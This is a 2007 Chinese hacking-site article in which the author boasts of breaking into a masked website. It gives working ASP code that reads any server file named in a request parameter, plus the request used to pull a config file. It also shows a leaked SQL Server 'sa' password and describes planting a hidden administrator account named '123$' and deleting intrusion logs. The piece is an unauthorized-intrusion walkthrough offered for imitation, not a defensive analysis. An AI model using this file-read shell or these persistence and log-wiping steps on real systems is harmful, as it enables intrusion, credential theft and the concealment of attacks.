·搜黑-全球首例黑客资讯搜索
·视频-国内视频学习教学大全
·设计-汇集百家设计网站精华
·编程-13大编程语言全面学习
安全中国首页 > 文章中心 > 黑客技术
我是如何突破一流检测系统的
http://www.anqn.com     时间:2007-9-9 8:53:18      责任编辑:池天      网友评论
热 点:

攻击目标:www.***.com
测试过的动作,一句话马,加密马,等。
测试结果:无效,无法上传,无法进入系统。
经过2天的分析,
然后自己搞出了一个代码,利用此代码读取了该网站下的config.asp文件源代码

-------------------------------------------------------------------------

<%
file=Request("file")
Set FSOOBJ=Server.CreateObject("Scripting.FileSystemObject")
if FSOOBJ.fileExists(file) then
Set myfile=FSOOBJ.opentextfile(file,1)
 Response.write "<pre>" & server.HTMLEncode(myfile.readall) &"</pre>"
 myfile.close
Set myfile=nothing
else
 Response.write "file(" & file & ") not exists."
end if
%>
-------------------------------------------------------------------------

http://www.***.com/view.asp?file=D:\wwwroot\index.asp

读取到的敏感内容
sql地址:***.***.***.***
帐号:sa 密码:u8f2444f

利用此帐号进入后,建立了123$的隐藏管理员用户,删除入侵日志后退出。

·上一篇: Win2K系统几个攻击实例成败心得(二)
·下一篇: 管理员的玩笑管理员权限上传漏洞解析

发表评论  打印本文  返回顶部  关闭窗口
最新5条评论 条评论
条评论
名称: 信箱:

相关连接
·冒充“超级兔子” 木马突破软键盘(图) [2007-9-25]
·三顾讯时--对讯时新闻发布系统的艰难突破(图) [2007-9-24]
·突破SQL注入攻击时输入框长度的限制 [2007-9-22]
·AK922:突破磁盘低级检测实现文件隐藏 [2007-9-21]
·突破两大难题 江民KV2008正式发布(图) [2007-9-13]
·网吧突破1433封锁继续冲钱 [2007-9-15]
·突破腾讯空间限制暴传图片(不是黄钻) [2007-9-14]
·在网吧建立外网IP玩传奇私服和突破限制 [2007-9-13]
·突破SQL注入攻击时输入框长度的限制 [2007-9-4]
·突破网关进入内网 巧妙利用端口重定向 [2007-9-2]